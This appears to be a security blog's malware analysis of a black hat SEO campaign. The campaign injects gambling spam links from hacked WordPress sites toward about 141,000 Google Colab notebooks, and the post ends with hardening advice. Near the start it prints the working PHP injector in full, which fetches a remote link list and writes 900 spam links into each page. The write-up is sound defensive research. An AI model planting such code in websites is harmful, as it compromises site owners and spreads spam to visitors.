This investigation started with a small and quite simple piece of PHP malware found on a hacked website. We located the following PHP code, responsible for injecting spammy links, within a wp-includes.php file:
<?php $lines = file('https://4ip[.]su/db/links.txt'); shuffle($lines); $data = array_rand($lines, 900); echo '<p>'; foreach($data as $value) { $rand = substr(md5(microtime()),rand(0,26),6); echo '<a href="'.$lines[$value].'">'.$rand.'</a> '; }; echo '</p>'; ?>
This script fetches a list of links from a remote location (hxxps://4ip[.]su/db/links.txt) and then injects some of them into a web page. Quite a simple piece of malware, behavior that we commonly find on hacked websites.
Nonetheless, the details were much more interesting.
900 injected spam links
It is quite common for spammy injections to have 5-10 links. Sometimes, we even see several dozen injected links. In extremely rare circumstances, we find more than a hundred links on a single page.
But in this case, the script injects exactly 900 links! The following code selects 900 random links from the downloaded list and then creates <a> tags for them to place on the web page.
$data = array_rand($lines, 900);
The list is even bigger: 141,000+ links
900 links is already quite impressive, but we know that they are randomly selected from an even bigger list downloaded from (hxxps://4ip[.]su/db/links.txt). The question is, how much bigger is this list — and what exactly is on it?
It’s time to check the contents from the 4ip[.]su text file:
What we see is quite surprising:
- All links point to colab.research.google.com
- The total number of spam links is 141,341!
Gambling spam on Google Colaboratory
All 141,341 URLs in the list points to Google Colaboratory documents in Russian with hyperlinks to online gambling sites.
Google Colaboratory (or Colab) is a lesser-known Google application that, along with more popular Google Docs and Google Sheets, allows you to create documents in Google Drive and collaborate with other people.
Colab is basically just a cloud-based version of Jupyter notebook environment aimed mainly for students and data scientists allowing them to write and execute Python code in a web browser and collaborate on their projects with an unlimited number of people.
The Colab documents (notebooks) combine executable Python code and rich text along with images and HTML. The documents are stored in the Google Drive accounts of their author, who can share them just like any other Google Drive document.
The bad actors abused the Colab by creating notebooks that only contain spammy content (text, image and hyperlinks) without any Python code whatsoever. The documents are shared so that anyone with the link can open them.
Contents of spam .ipynb files
This is what the contents of the spammy notebook files (.ipynb) looks like:
Many of these documents are interlinked, making discovery of them easier for search engines. Some of the links offer to download something (“Рискни скачать” translated as “take a chance and download”) — probably some gambling application.
However, something went wrong and when you click “Download” on any of these links, you get the 404 error from Google.
Inception and campaign duration
The Bitly link found in the notebooks (bit[.]ly/izzi_calab -> slotds[.]com/izzicolab) lets us estimate the time when this campaign started. The link was created on July 12, 2022, so the whole campaign should be about 1 year old.
Another hint about the beginning of the campaign is the time the 4ip[.]su domain was registered — June 23, 2022.
The 4ip[.]su server location is hidden by the CloudFlare proxy. However we can see the email associated with this domain: seo2@jetmail .cc. A search reveals that the same email address is linked to one more similar domain c64[.]su, which has been registered since September 22, 2020.
Google accounts used in black hat SEO campaign
Basically, hackers used Google Colaboratory as a tool to generate web pages with spammy links that are hosted for free on a reputable colab.research.google.com domain and can be indexed by search engines (including Google, of course).
While it’s true that storing documents on Google Drive is free, you should not forget that quotas apply (which is important when you create hundreds of thousands of documents) and it is easy to nuke all spammy documents at once if Google detects the abuse of their services.
To work around both of the problems, the bad actor used multiple accounts to create and share the spammy Google Colab notebooks. This way, each account easily operates within the free quotas and if the account is disabled by Google, only a limited number of spammy pages will be affected.
An interesting question is how many accounts were used in this particular black hat SEO campaign?
In Google Colab you can select the “View -> Notebook Info” menu to get information about the notebook owner (the account that created the notebook).
Creating or hacking 141,000 Google accounts is not an easy task, so we expected to see multiple documents created by the same accounts.
We checked a small number of random links. By the time we started consistently seeing documents created by the already discovered accounts, we had collected a little bit over a hundred Gmail accounts participating in this black hat SEO campaign. Which allows us to estimate around 1,000 spam documents per account.
The names (not emails) of the account owners can be found on the internet on various social media platforms. They belong to real individuals from all over the world but mostly from Africa and Asia (some of the names are completely in Arabic).
It’s not clear at this point whether the accounts were hacked or hackers just scraped social networks for names of real people and then created fake accounts impersonating them. Given that there is no clear pattern between the names and email addresses, most likely these are hacked accounts of real people.
Campaign visibility in search results
Now, let’s estimate what the bad actors managed to achieve. If we search for the keywords found in titles of the spammy documents we inevitably find links to the colab notebooks on the first page of Google search results.
If you search for names of the casinos on the Google Colab domain, you’ll find thousands of results for each of them. For example:
- site:colab.research.google.com “Jet casino” — 14,100 results
- site:colab.research.google.com “Izzzi Casino” — 32,000 results
- site:colab.research.google.com “Sol Casino” — 10,400 results
- site:colab.research.google.com “Rox Casino” — 10,700 results
- site:colab.research.google.com “Casino: ПОЛУЧИТЬ БОНУС” – 32,300 results
The word casino alone is found on about 100,000 Google Colab pages. Absolute majority of them are spam.
You can easily find several other black hat SEO campaigns in different languages as well.
Other spam topics on Google Colab
After checking out these gambling spam pages on the Google Colab platform, we decided to check what other spam campaigns might be leveraging Google public Colab notebooks.
It turned out that many types of SEO spam can be easily found there just by searching Google for site:colab.research.google.com [keyword] and replacing [keyword] with some keywords associated with popular spam topics.
- Buy viagra — 1880 results
- Payday loan — 2830 results
- Write essay — 16,700 results
However, the majority of them came from the black hat SEO campaign that promotes the “read/watch/stream online” scams that lure you by offering something for free, then require to pay $1 for a trial and because of the fine-print you end up with a bunch of expensive and pretty useless subscriptions.
For example, the [“Read Book Here” “Download Book Here”] search currently returns 2,610,000 results from the Google Colab domain.
Closing thoughts
While Google’s free and open tools are undeniably valuable for collaboration (and innovation), it’s evident that complications arise when they become a haven for bad actors. Millions of documents with spam content on the Google Colab platform reveal that spammers have found yet another method to host doorways that they actively promote via spam link injections on compromised websites.
As a website owner, the solution to this issue remains the same as with all other malware infections: do your absolute best to protect your environment from malware, known software vulnerabilities, and harden your website against attackers to prevent infection.
Some steps you can take to mitigate risk includes:
- Regularly patch all of your website software (including plugins and themes) with the latest updates to help prevent exploitation of known vulnerabilities.
- Protect your admin and login pages with CAPTCHA, IP restrictions, and limit login attempts.
- Harden your website with configuration rules for your .htaccess file.
- Add security rules to your wp-config.php file to prevent attackers from being able to modify files directly through the dashboard or install malicious plugins.
- Use strong unique passwords for all of your accounts, including database, admin, and sFTP credentials.
- Monitor your website for indicators of compromise and set up file integrity control monitoring.
- Regularly make backups of your website and store them in a secure, off-site location for quick recovery.
- Use a web application firewall to mitigate brute force, bad bots, and help virtually patch against known software vulnerabilities.